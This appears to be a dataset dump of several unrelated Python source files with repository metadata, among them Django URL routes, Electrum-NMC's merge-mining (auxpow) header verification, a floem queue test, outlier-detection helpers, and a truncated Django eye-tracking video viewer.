models.Relationship.objects.get(from_person=self) class Relationship(models.Model): """Class to represent many to many relation between Ctizens""" from_people = models.ForeignKey(Citizen, related_name='from_people', on_delete=models.CASCADE) to_people = models.ForeignKey(Citizen, related_name='to_people', on_delete=models.CASCADE)
68
0
27
e340c1025aff6d53bab2a99990b56f88b3b6f369
1,001
py
Python
aocpo_backend/aocpo_api/urls.py
CoderChen01/aocpo
279bfae910a30be762e1954df1a53a6217a6e300
[ "Apache-2.0" ]
7
2020-02-17T12:20:26.000Z
2021-03-15T01:02:34.000Z
aocpo_backend/aocpo_api/urls.py
CoderChen01/aocpo
279bfae910a30be762e1954df1a53a6217a6e300
[ "Apache-2.0" ]
3
2020-04-19T03:01:41.000Z
2020-04-19T03:02:09.000Z
aocpo_backend/aocpo_api/urls.py
CoderChen01/aocpo
279bfae910a30be762e1954df1a53a6217a6e300
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- from django.urls import path from .views import login_register, task_manage, analysis_page urlpatterns = [ path('login/', login_register.Login.as_view()), path('register/', login_register.SignIn.as_view()), path('register/check_username', login_register.SignIn.as_view()), path('task_manager/addition/', task_manage.TaskManage.as_view()), path('task_manager/removing/', task_manage.TaskManage.as_view()), path('task_manager/recovering/', task_manage.Recover.as_view()), path('task_manager/upgrade/', task_manage.TaskManage.as_view()), path('task_manager/tasks', task_manage.TaskManage.as_view()), path('task_manager/schools', task_manage.SearchSchool.as_view()), path('analysis_page/posts_data', analysis_page.GetData.as_view()), path('analysis_page/users_analysis_data', analysis_page.GetUserAnalyseData.as_view()), path('analysis_page/posts_analysis_data', analysis_page.GetPostsAnalysisData.as_view()) ]
52.684211
91
0.751249
#!/usr/bin/env python # -*- coding: utf-8 -*- from django.urls import path from .views import login_register, task_manage, analysis_page urlpatterns = [ path('login/', login_register.Login.as_view()), path('register/', login_register.SignIn.as_view()), path('register/check_username', login_register.SignIn.as_view()), path('task_manager/addition/', task_manage.TaskManage.as_view()), path('task_manager/removing/', task_manage.TaskManage.as_view()), path('task_manager/recovering/', task_manage.Recover.as_view()), path('task_manager/upgrade/', task_manage.TaskManage.as_view()), path('task_manager/tasks', task_manage.TaskManage.as_view()), path('task_manager/schools', task_manage.SearchSchool.as_view()), path('analysis_page/posts_data', analysis_page.GetData.as_view()), path('analysis_page/users_analysis_data', analysis_page.GetUserAnalyseData.as_view()), path('analysis_page/posts_analysis_data', analysis_page.GetPostsAnalysisData.as_view()) ]
0
0
0
45719d34a81e10187b4b4005d07f676e2396fd1d
905
py
Python
example_project/urls.py
amarandon/django-audiotracks
e2480ebe555b07cc3c3c60b075a7caed462ed96d
[ "MIT" ]
30
2015-04-16T04:56:30.000Z
2021-02-26T05:28:54.000Z
example_project/urls.py
amarandon/django-audiotracks
e2480ebe555b07cc3c3c60b075a7caed462ed96d
[ "MIT" ]
2
2016-05-29T09:41:40.000Z
2016-07-12T17:47:06.000Z
example_project/urls.py
amarandon/django-audiotracks
e2480ebe555b07cc3c3c60b075a7caed462ed96d
[ "MIT" ]
10
2015-07-16T12:57:41.000Z
2021-12-05T22:06:22.000Z
from django.conf import settings from django.conf.urls import url, include from django.contrib.staticfiles.urls import staticfiles_urlpatterns from main import views from django.contrib.auth import views as auth_views from django.views.static import serve # Uncomment the next two lines to enable the admin: from django.contrib import admin admin.autodiscover() urlpatterns = [ url(r'^$', views.index, name="home"), url("^music/", include("audiotracks.urls")), url("^(?P<username>[\w\._-]+)/music/", include("audiotracks.urls")), url(r'^login$', auth_views.login, name="login"), url(r'^logout$', auth_views.logout, name="logout"), url(r'^admin/', include(admin.site.urls)), ] if settings.DEBUG: urlpatterns += [ url(r'^site_media/(?P<path>.*)$', serve, { 'document_root': settings.MEDIA_ROOT }) ] urlpatterns += staticfiles_urlpatterns()
32.321429
72
0.685083
from django.conf import settings from django.conf.urls import url, include from django.contrib.staticfiles.urls import staticfiles_urlpatterns from main import views from django.contrib.auth import views as auth_views from django.views.static import serve # Uncomment the next two lines to enable the admin: from django.contrib import admin admin.autodiscover() urlpatterns = [ url(r'^$', views.index, name="home"), url("^music/", include("audiotracks.urls")), url("^(?P<username>[\w\._-]+)/music/", include("audiotracks.urls")), url(r'^login$', auth_views.login, name="login"), url(r'^logout$', auth_views.logout, name="logout"), url(r'^admin/', include(admin.site.urls)), ] if settings.DEBUG: urlpatterns += [ url(r'^site_media/(?P<path>.*)$', serve, { 'document_root': settings.MEDIA_ROOT }) ] urlpatterns += staticfiles_urlpatterns()
0
0
0
85ec8b6d8d12f7b35f2c1f28a6864da735f40a62
864
py
Python
mathbox/app/signal/outlier.py
freedeaths/mathbox-py
e294dc1b916bb634807378883b1ba941a924bec5
[ "MIT" ]
7
2021-12-23T07:03:12.000Z
2021-12-31T06:35:34.000Z
mathbox/app/signal/outlier.py
freedeaths/mathbox-py
e294dc1b916bb634807378883b1ba941a924bec5
[ "MIT" ]
8
2021-12-23T06:12:19.000Z
2022-01-07T15:01:47.000Z
mathbox/app/signal/outlier.py
freedeaths/mathbox-py
e294dc1b916bb634807378883b1ba941a924bec5
[ "MIT" ]
null
null
null
from mathbox.statistics.estimator import mean, std # Generalized ESD Test for Outliers # https://www.itl.nist.gov/div898/handbook/eda/section3/eda35h3.htm
39.272727
89
0.675926
from mathbox.statistics.estimator import mean, std def noise_outlier(noise, bias=3): noise_mean = mean(noise) noise_std = std(noise) outlier_lo = [(i,x) for i,x in enumerate(noise) if x < noise_mean - bias * noise_std] outlier_hi = [(i,x) for i,x in enumerate(noise) if x > noise_mean + bias * noise_std] return outlier_lo, outlier_hi def simple_outlier(series, bias=3): sorted_series = sorted(series) length = len(series) q3 = sorted_series[int(length * 0.75)] q1 = sorted_series[int(length * 0.25)] outlier_lo = [(i,x) for i,x in enumerate(series) if x < q1 - bias * (q3 - q1)] outlier_hi = [(i,x) for i,x in enumerate(series) if x > q3 + bias * (q3 - q1)] return outlier_lo, outlier_hi # Generalized ESD Test for Outliers # https://www.itl.nist.gov/div898/handbook/eda/section3/eda35h3.htm def gesd(): pass
641
0
68
9070ee332d8938903159cc96d4620a2bd3b5401c
397
py
Python
OS/Syncronization/main.py
prtx/What-I-learned-in-college
914f6e69beafdf66f53410bc7cd2e5344bf43308
[ "MIT" ]
null
null
null
OS/Syncronization/main.py
prtx/What-I-learned-in-college
914f6e69beafdf66f53410bc7cd2e5344bf43308
[ "MIT" ]
null
null
null
OS/Syncronization/main.py
prtx/What-I-learned-in-college
914f6e69beafdf66f53410bc7cd2e5344bf43308
[ "MIT" ]
null
null
null
#!/usr/bin/python from requirement import * from producer import producer from scheduler import fcfs from teller import teller txt = open('result/processes','w') txt.write('Processes\n\n') #Thread(target = producer).start() producer() for process in processes: txt.write(str(process)+'\n') for i in range(teller_count): tellers.append( teller() ) a = fcfs(processes,tellers) txt.close()
16.541667
34
0.730479
#!/usr/bin/python from requirement import * from producer import producer from scheduler import fcfs from teller import teller txt = open('result/processes','w') txt.write('Processes\n\n') #Thread(target = producer).start() producer() for process in processes: txt.write(str(process)+'\n') for i in range(teller_count): tellers.append( teller() ) a = fcfs(processes,tellers) txt.close()
0
0
0
33ee54f7c6793f6de7032a70a6e0460c0d4a6957
1,674
py
Python
floem/programs/queue_custom.py
mangpo/floem
2ff53dc601237597b299ebf93607d51b82cb8f4c
[ "BSD-2-Clause" ]
21
2018-10-10T18:52:32.000Z
2022-02-16T12:23:51.000Z
floem/programs/queue_custom.py
mangpo/floem
2ff53dc601237597b299ebf93607d51b82cb8f4c
[ "BSD-2-Clause" ]
null
null
null
floem/programs/queue_custom.py
mangpo/floem
2ff53dc601237597b299ebf93607d51b82cb8f4c
[ "BSD-2-Clause" ]
3
2020-04-22T23:09:26.000Z
2021-09-30T01:35:34.000Z
from floem import * n_cores = 2 Enq, Deq, Release = queue.queue_custom('queue', Tuple, 4, n_cores, Tuple.task, enq_output=True) RxWrite('mysend') RxPrint('process') c = Compiler() c.testing = r''' Tuple tuples[5]; for(int i=0; i<5;i++) { tuples[i].task = 10; tuples[i].val = i; } for(int i=0; i<5;i++) { mysend(&tuples[i], 0); process(0); } for(int i=0; i<5;i++) { tuples[i].val = 100 + i; mysend(&tuples[i], 1); tuples[i].task = 0; } for(int i=0; i<5;i++) { process(1); } ''' c.generate_code_and_run([0,0,-1,1,-2,2,-3,3,-4,4,-100,-101,-102,-103,-104,100,101,102,103])
20.666667
95
0.549582
from floem import * n_cores = 2 class Tuple(State): val = Field(Int) task = Field(Uint(8)) layout = [val, task] class Display(Element): def configure(self): self.inp = Input(queue.q_buffer) self.out = Output(queue.q_buffer) def impl(self): self.run_c(r''' q_buffer buff = inp(); Tuple* t = (Tuple*) buff.entry; if(t) printf("%d\n", t->val); output switch { case t: out(buff); } ''') class EnqConfirm(Element): def configure(self): self.inp = Input(Pointer(Tuple)) def impl(self): self.run_c(r''' Tuple* t = inp(); printf("%d\n", -t->val); ''') Enq, Deq, Release = queue.queue_custom('queue', Tuple, 4, n_cores, Tuple.task, enq_output=True) class RxWrite(CallableSegment): def configure(self): self.inp = Input(Pointer(Tuple), Int) def impl(self): enq = Enq() self.inp >> enq >> EnqConfirm() class RxPrint(CallableSegment): def configure(self): self.inp = Input(Int) def impl(self): deq = Deq() release = Release() display = Display() self.inp >> deq >> display >> release RxWrite('mysend') RxPrint('process') c = Compiler() c.testing = r''' Tuple tuples[5]; for(int i=0; i<5;i++) { tuples[i].task = 10; tuples[i].val = i; } for(int i=0; i<5;i++) { mysend(&tuples[i], 0); process(0); } for(int i=0; i<5;i++) { tuples[i].val = 100 + i; mysend(&tuples[i], 1); tuples[i].task = 0; } for(int i=0; i<5;i++) { process(1); } ''' c.generate_code_and_run([0,0,-1,1,-2,2,-3,3,-4,4,-100,-101,-102,-103,-104,100,101,102,103])
641
97
327
539ef8f7d8675478ff779ecc18fb39f706cede98
14,871
py
Python
electrum/auxpow.py
ZenyattaAbosom/AbosomElectrum
02748b0b14e37385d6e77591d122e592740222bf
[ "MIT" ]
4
2020-06-27T22:43:34.000Z
2021-04-12T02:29:30.000Z
electrum/auxpow.py
ZenyattaAbosom/AbosomElectrum
02748b0b14e37385d6e77591d122e592740222bf
[ "MIT" ]
21
2020-06-20T15:02:50.000Z
2021-04-07T10:14:59.000Z
electrum/auxpow.py
ZenyattaAbosom/AbosomElectrum
02748b0b14e37385d6e77591d122e592740222bf
[ "MIT" ]
13
2020-06-28T08:13:28.000Z
2021-12-28T00:11:56.000Z
# -*- coding: utf-8 -*- # # Electrum-NMC - lightweight Namecoin client # Copyright (C) 2018 The Namecoin developers # # License for all components not part of Electrum-DOGE: # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # Based on Electrum-DOGE - lightweight Dogecoin client # Copyright (C) 2014 The Electrum-DOGE contributors # # License for the Electrum-DOGE components: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import binascii from .bitcoin import hash_encode, hash_decode from .crypto import sha256d from . import blockchain, constants, transaction from .transaction import BCDataStream, Transaction, TxOutput, TYPE_SCRIPT from .util import bfh, bh2u # Maximum index of the merkle root hash in the coinbase transaction script, # where no merged mining header is present. MAX_INDEX_PC_BACKWARDS_COMPATIBILITY = 20 # Header for merge-mining data in the coinbase. COINBASE_MERGED_MINING_HEADER = bfh('fabe') + b'mm' def deserialize_auxpow_header(base_header, s, start_position=0) -> (dict, int): """Deserialises an AuxPoW instance. Returns the deserialised AuxPoW dict and the end position in the byte array as a pair.""" auxpow_header = {} # Chain ID is the top 16 bits of the 32-bit version. auxpow_header['chain_id'] = get_chain_id(base_header) # The parent coinbase transaction is first. # Deserialize it and save the trailing data. parent_coinbase_tx = Transaction(s, expect_trailing_data=True, copy_input=False, start_position=start_position) parent_coinbase_tx._allow_zero_outputs = True start_position = fast_tx_deserialize(parent_coinbase_tx) auxpow_header['parent_coinbase_tx'] = parent_coinbase_tx # Next is the parent block hash. According to the Bitcoin.it wiki, # this field is not actually consensus-critical. So we don't save it. start_position = start_position + 32 # The coinbase and chain merkle branches/indices are next. # Deserialize them and save the trailing data. auxpow_header['coinbase_merkle_branch'], auxpow_header['coinbase_merkle_index'], start_position = deserialize_merkle_branch(s, start_position=start_position) auxpow_header['chain_merkle_branch'], auxpow_header['chain_merkle_index'], start_position = deserialize_merkle_branch(s, start_position=start_position) # Finally there's the parent header. Deserialize it. parent_header_bytes = s[start_position : start_position + constants.net.HEADER_SIZE] auxpow_header['parent_header'] = blockchain.deserialize_pure_header(parent_header_bytes, None) start_position += constants.net.HEADER_SIZE # The parent block header doesn't have any block height, # so delete that field. (We used None as a dummy value above.) del auxpow_header['parent_header']['block_height'] return auxpow_header, start_position # Copied from merkle_branch_from_string in https://github.com/electrumalt/electrum-doge/blob/f74312822a14f59aa8d50186baff74cade449ccd/lib/blockchain.py#L622 # Returns list of hashes, merkle index, and position of trailing data in s # TODO: Audit this function carefully. # Reimplementation of btcutils.check_merkle_branch from Electrum-DOGE. # btcutils seems to have an unclear license and no obvious Git repo, so it # seemed wiser to re-implement. # This re-implementation is roughly based on libdohj's calculateMerkleRoot. # Copied from Electrum-DOGE # TODO: Audit this function carefully. # https://github.com/kR105/i0coin/compare/bitcoin:master...master#diff-610df86e65fce009eb271c2a4f7394ccR262 # Copied from Electrum-DOGE # TODO: Audit this function carefully. # This is calculated the same as the Transaction.txid() method, but doesn't # reserialize it. # Used by fast_tx_deserialize # This is equivalent to (tx.deserialize(), ), but doesn't parse outputs.
39.134211
161
0.721404
# -*- coding: utf-8 -*- # # Electrum-NMC - lightweight Namecoin client # Copyright (C) 2018 The Namecoin developers # # License for all components not part of Electrum-DOGE: # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # Based on Electrum-DOGE - lightweight Dogecoin client # Copyright (C) 2014 The Electrum-DOGE contributors # # License for the Electrum-DOGE components: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import binascii from .bitcoin import hash_encode, hash_decode from .crypto import sha256d from . import blockchain, constants, transaction from .transaction import BCDataStream, Transaction, TxOutput, TYPE_SCRIPT from .util import bfh, bh2u # Maximum index of the merkle root hash in the coinbase transaction script, # where no merged mining header is present. MAX_INDEX_PC_BACKWARDS_COMPATIBILITY = 20 # Header for merge-mining data in the coinbase. COINBASE_MERGED_MINING_HEADER = bfh('fabe') + b'mm' class AuxPowVerifyError(Exception): pass class AuxPoWNotGenerateError(AuxPowVerifyError): pass class AuxPoWOwnChainIDError(AuxPowVerifyError): pass class AuxPoWChainMerkleTooLongError(AuxPowVerifyError): pass class AuxPoWBadCoinbaseMerkleBranchError(AuxPowVerifyError): pass class AuxPoWCoinbaseNoInputsError(AuxPowVerifyError): pass class AuxPoWCoinbaseRootTooLate(AuxPowVerifyError): pass class AuxPoWCoinbaseRootMissingError(AuxPowVerifyError): pass class AuxPoWCoinbaseRootDuplicatedError(AuxPowVerifyError): pass class AuxPoWCoinbaseRootWrongOffset(AuxPowVerifyError): pass def get_chain_id(base_header): return base_header['version'] >> 16 def deserialize_auxpow_header(base_header, s, start_position=0) -> (dict, int): """Deserialises an AuxPoW instance. Returns the deserialised AuxPoW dict and the end position in the byte array as a pair.""" auxpow_header = {} # Chain ID is the top 16 bits of the 32-bit version. auxpow_header['chain_id'] = get_chain_id(base_header) # The parent coinbase transaction is first. # Deserialize it and save the trailing data. parent_coinbase_tx = Transaction(s, expect_trailing_data=True, copy_input=False, start_position=start_position) parent_coinbase_tx._allow_zero_outputs = True start_position = fast_tx_deserialize(parent_coinbase_tx) auxpow_header['parent_coinbase_tx'] = parent_coinbase_tx # Next is the parent block hash. According to the Bitcoin.it wiki, # this field is not actually consensus-critical. So we don't save it. start_position = start_position + 32 # The coinbase and chain merkle branches/indices are next. # Deserialize them and save the trailing data. auxpow_header['coinbase_merkle_branch'], auxpow_header['coinbase_merkle_index'], start_position = deserialize_merkle_branch(s, start_position=start_position) auxpow_header['chain_merkle_branch'], auxpow_header['chain_merkle_index'], start_position = deserialize_merkle_branch(s, start_position=start_position) # Finally there's the parent header. Deserialize it. parent_header_bytes = s[start_position : start_position + constants.net.HEADER_SIZE] auxpow_header['parent_header'] = blockchain.deserialize_pure_header(parent_header_bytes, None) start_position += constants.net.HEADER_SIZE # The parent block header doesn't have any block height, # so delete that field. (We used None as a dummy value above.) del auxpow_header['parent_header']['block_height'] return auxpow_header, start_position # Copied from merkle_branch_from_string in https://github.com/electrumalt/electrum-doge/blob/f74312822a14f59aa8d50186baff74cade449ccd/lib/blockchain.py#L622 # Returns list of hashes, merkle index, and position of trailing data in s # TODO: Audit this function carefully. def deserialize_merkle_branch(s, start_position=0): vds = BCDataStream() vds.input = s vds.read_cursor = start_position hashes = [] n_hashes = vds.read_compact_size() for i in range(n_hashes): _hash = vds.read_bytes(32) hashes.append(hash_encode(_hash)) index = vds.read_int32() return hashes, index, vds.read_cursor def hash_parent_header(header): if not constants.net.is_auxpow_active(header): return blockchain.hash_header(header) verify_auxpow(header) return blockchain.hash_header(header['auxpow']['parent_header']) # Reimplementation of btcutils.check_merkle_branch from Electrum-DOGE. # btcutils seems to have an unclear license and no obvious Git repo, so it # seemed wiser to re-implement. # This re-implementation is roughly based on libdohj's calculateMerkleRoot. def calculate_merkle_root(leaf, merkle_branch, index): target = hash_decode(leaf) mask = index for merkle_step in merkle_branch: if mask & 1 == 0: # 0 means it goes on the right data_to_hash = target + hash_decode(merkle_step) else: data_to_hash = hash_decode(merkle_step) + target target = sha256d(data_to_hash) mask = mask >> 1 return hash_encode(target) # Copied from Electrum-DOGE # TODO: Audit this function carefully. # https://github.com/kR105/i0coin/compare/bitcoin:master...master#diff-610df86e65fce009eb271c2a4f7394ccR262 def calc_merkle_index(chain_id, nonce, merkle_size): rand = nonce rand = (rand * 1103515245 + 12345) & 0xffffffff rand += chain_id rand = (rand * 1103515245 + 12345) & 0xffffffff return rand % merkle_size # Copied from Electrum-DOGE # TODO: Audit this function carefully. def verify_auxpow(header): auxhash = blockchain.hash_header(header) auxpow = header['auxpow'] parent_block = auxpow['parent_header'] coinbase = auxpow['parent_coinbase_tx'] coinbase_hash = fast_txid(coinbase) chain_merkle_branch = auxpow['chain_merkle_branch'] chain_index = auxpow['chain_merkle_index'] coinbase_merkle_branch = auxpow['coinbase_merkle_branch'] coinbase_index = auxpow['coinbase_merkle_index'] #if (coinbaseTx.nIndex != 0) # return error("AuxPow is not a generate"); if (coinbase_index != 0): raise AuxPoWNotGenerateError("AuxPow is not a generate") #if (get_chain_id(parent_block) == chain_id) # return error("Aux POW parent has our chain ID"); if (get_chain_id(parent_block) == constants.net.AUXPOW_CHAIN_ID): raise AuxPoWOwnChainIDError("Aux POW parent has our chain ID") #if (vChainMerkleBranch.size() > 30) # return error("Aux POW chain merkle branch too long"); if (len(chain_merkle_branch) > 30): raise AuxPoWChainMerkleTooLongError("Aux POW chain merkle branch too long") #// Check that the chain merkle root is in the coinbase #uint256 nRootHash = CBlock::CheckMerkleBranch(hashAuxBlock, vChainMerkleBranch, nChainIndex); #vector<unsigned char> vchRootHash(nRootHash.begin(), nRootHash.end()); #std::reverse(vchRootHash.begin(), vchRootHash.end()); // correct endian # Check that the chain merkle root is in the coinbase root_hash_bytes = bfh(calculate_merkle_root(auxhash, chain_merkle_branch, chain_index)) # Check that we are in the parent block merkle tree # if (CBlock::CheckMerkleBranch(GetHash(), vMerkleBranch, nIndex) != parentBlock.hashMerkleRoot) # return error("Aux POW merkle root incorrect"); if (calculate_merkle_root(coinbase_hash, coinbase_merkle_branch, coinbase_index) != parent_block['merkle_root']): raise AuxPoWBadCoinbaseMerkleBranchError("Aux POW merkle root incorrect") #// Check that there is at least one input. #if (coinbaseTx->vin.empty()) # return error("Aux POW coinbase has no inputs"); # Check that there is at least one input. if (len(coinbase.inputs()) == 0): raise AuxPoWCoinbaseNoInputsError("Aux POW coinbase has no inputs") # const CScript script = coinbaseTx->vin[0].scriptSig; script_bytes = coinbase.inputs()[0].script_sig #// Check that the same work is not submitted twice to our chain. #// # const unsigned char* const mmHeaderBegin = pchMergedMiningHeader; # const unsigned char* const mmHeaderEnd # = mmHeaderBegin + sizeof (pchMergedMiningHeader); # CScript::const_iterator pcHead = # std::search(script.begin(), script.end(), mmHeaderBegin, mmHeaderEnd); pos_header = script_bytes.find(COINBASE_MERGED_MINING_HEADER) #CScript::const_iterator pc = # std::search(script.begin(), script.end(), vchRootHash.begin(), vchRootHash.end()); pos = script_bytes.find(root_hash_bytes) #if (pc == script.end()) if pos == -1: #return error("Aux POW missing chain merkle root in parent coinbase"); raise AuxPoWCoinbaseRootMissingError('Aux POW missing chain merkle root in parent coinbase') #if (pcHead != script.end()) #{ if pos_header != -1: #// Enforce only one chain merkle root by checking that a single instance of the merged #// mining header exists just before. #if (script.end() != std::search(pcHead + 1, script.end(), UBEGIN(pchMergedMiningHeader), UEND(pchMergedMiningHeader))) #return error("Multiple merged mining headers in coinbase"); #if (pcHead + sizeof(pchMergedMiningHeader) != pc) #return error("Merged mining header is not just before chain merkle root"); if -1 != script_bytes.find(COINBASE_MERGED_MINING_HEADER, pos_header + 1): raise AuxPoWCoinbaseRootDuplicatedError('Multiple merged mining headers in coinbase') if pos_header + len(COINBASE_MERGED_MINING_HEADER) != pos: raise AuxPoWCoinbaseRootWrongOffset('Merged mining header is not just before chain merkle root') #} #else #{ else: #// For backward compatibility. #// Enforce only one chain merkle root by checking that it starts early in the coinbase. #// 8-12 bytes are enough to encode extraNonce and nBits. #if (pc - script.begin() > 20) #return error("Aux POW chain merkle root must start in the first 20 bytes of the parent coinbase"); # For backward compatibility. # Enforce only one chain merkle root by checking that it starts early in the coinbase. # 8-12 bytes are enough to encode extraNonce and nBits. if pos > 20: raise AuxPoWCoinbaseRootTooLate("Aux POW chain merkle root must start in the first 20 bytes of the parent coinbase") #} #// Ensure we are at a deterministic point in the merkle leaves by hashing #// a nonce and our chain ID and comparing to the index. #pc += vchRootHash.size(); #if (script.end() - pc < 8) #return error("Aux POW missing chain merkle tree size and nonce in parent coinbase"); pos = pos + len(root_hash_bytes) if (len(script_bytes) - pos < 8): raise Exception('Aux POW missing chain merkle tree size and nonce in parent coinbase') #int nSize; #memcpy(&nSize, &pc[0], 4); #if (nSize != (1 << vChainMerkleBranch.size())) #return error("Aux POW merkle branch size does not match parent coinbase"); def bytes_to_int(b): return int.from_bytes(b, byteorder='little') size = bytes_to_int(script_bytes[pos:pos+4]) nonce = bytes_to_int(script_bytes[pos+4:pos+8]) #print 'size',size #print 'nonce',nonce #print '(1 << len(chain_merkle_branch)))', (1 << len(chain_merkle_branch)) #size = hex_to_int(script[pos:pos+4]) #nonce = hex_to_int(script[pos+4:pos+8]) if (size != (1 << len(chain_merkle_branch))): raise Exception('Aux POW merkle branch size does not match parent coinbase') #int nNonce; #memcpy(&nNonce, &pc[4], 4); #// Choose a pseudo-random slot in the chain merkle tree #// but have it be fixed for a size/nonce/chain combination. #// #// This prevents the same work from being used twice for the #// same chain while reducing the chance that two chains clash #// for the same slot. #unsigned int rand = nNonce; #rand = rand * 1103515245 + 12345; #rand += nChainID; #rand = rand * 1103515245 + 12345; #if (nChainIndex != (rand % nSize)) #return error("Aux POW wrong index"); index = calc_merkle_index(constants.net.AUXPOW_CHAIN_ID, nonce, size) #print 'index', index if (chain_index != index): raise Exception('Aux POW wrong index') # This is calculated the same as the Transaction.txid() method, but doesn't # reserialize it. def fast_txid(tx): return bh2u(sha256d(tx._cached_network_ser_bytes)[::-1]) # Used by fast_tx_deserialize def stub_parse_output(vds): vds.read_int64() # value vds.read_bytes(vds.read_compact_size()) # scriptpubkey return TxOutput(value=0, scriptpubkey=b'') # This is equivalent to (tx.deserialize(), ), but doesn't parse outputs. def fast_tx_deserialize(tx): # Monkeypatch output address parsing with a stub, since we only care about # inputs. real_parse_output, transaction.parse_output = transaction.parse_output, stub_parse_output try: result = tx.deserialize() except Exception as exc: print(exc) finally: # Restore the real output address parser. transaction.parse_output = real_parse_output return result
8,649
399
430
2d8bed25eba5b2d701f79d132f9bbf690b6b08da
545
py
Python
src/readset.py
Neko250/readset
22edf00320244be77455e3937e01dd405e478dea
[ "MIT" ]
null
null
null
src/readset.py
Neko250/readset
22edf00320244be77455e3937e01dd405e478dea
[ "MIT" ]
null
null
null
src/readset.py
Neko250/readset
22edf00320244be77455e3937e01dd405e478dea
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys def extract(file=None, path=None): """ Extract all of the YouTube links within a Headset user-made list. :param file: headset json export file path :param path: json path to extract, you can use [JSON Columns](http://json-columns.com) to get it :return: `list` containing all of the links in the list """ if not file or not path: print('error: file or json path not provided...') return None # todo: implement pass if __name__ == '__main__': extract()
21.8
98
0.67156
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys def extract(file=None, path=None): """ Extract all of the YouTube links within a Headset user-made list. :param file: headset json export file path :param path: json path to extract, you can use [JSON Columns](http://json-columns.com) to get it :return: `list` containing all of the links in the list """ if not file or not path: print('error: file or json path not provided...') return None # todo: implement pass if __name__ == '__main__': extract()
0
0
0
f8ed8a42efb7fd5e2ac5ef6c2ba9004eee3a0b6f
6,180
py
Python
svision/viewer/views.py
artkulak/ads-eye-tracking
693a87600362417361dc2725c3577dcbebf3925e
[ "Unlicense" ]
null
null
null
svision/viewer/views.py
artkulak/ads-eye-tracking
693a87600362417361dc2725c3577dcbebf3925e
[ "Unlicense" ]
null
null
null
svision/viewer/views.py
artkulak/ads-eye-tracking
693a87600362417361dc2725c3577dcbebf3925e
[ "Unlicense" ]
1
2022-02-10T11:19:04.000Z
2022-02-10T11:19:04.000Z
from django.shortcuts import render from django.http import HttpResponse from django.contrib.auth.forms import UserCreationForm from django.contrib.auth import login, authenticate from django.contrib.auth.models import User from django.http import JsonResponse #################### # IMPORT OTHER LIBS #################### import os import numpy as np import seaborn as sns import cv2 from heatmappy import Heatmapper from heatmappy.video import VideoHeatmapper from PIL import Image import moviepy.editor as mp import urllib import glob import pandas as pd from pathlib import Path import shutil import vimeo_dl as vimeo import plotly.express as px import plotly import plotly.graph_objects as go from .models import Video, VideoStat EMOTIONS = [ 'angry', 'disgusted', 'fearful', 'happy', 'neutral', 'sad', 'surprised' ] # # Create your views here. # def index(request): # return render(request, 'index.html') heatmap_points = [] def index(request): ''' Renders login + main page ''' global user if request.method == 'POST': username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is not None: # if user is authentificated data = Video.objects.all() response_data = { "video_data": data, "name" : username, "is_staff": user.is_staff, } return render(request, 'main.html', response_data) return render(request, 'index.html') else: form = UserCreationForm() return render(request, 'index.html', {'form': form}) def video(request, video_id): ''' Renders video page ''' global video video = list(Video.objects.all())[video_id-1] VideoStat.objects.filter(video_link= video.video_link, user_id= user.username).delete() response_data = { "name" : user.username, "video_name": video.video_name, "video_link": video.video_link, "is_staff": user.is_staff } return render(request, 'video.html', response_data) def recievePoints(request): ''' Recieves gaze points via ajax request ''' x, y = request.GET['x'], request.GET['y'] time = request.GET['time'] width, height = request.GET['width'], request.GET['height'] username = request.GET['username'] try: expressions = urllib.parse.unquote(request.GET['expressions']).split(';') expressions = list(map(float, expressions)) except: expressions = [] try: emotion = EMOTIONS[np.argmax(expressions)] except: emotion = 'None' 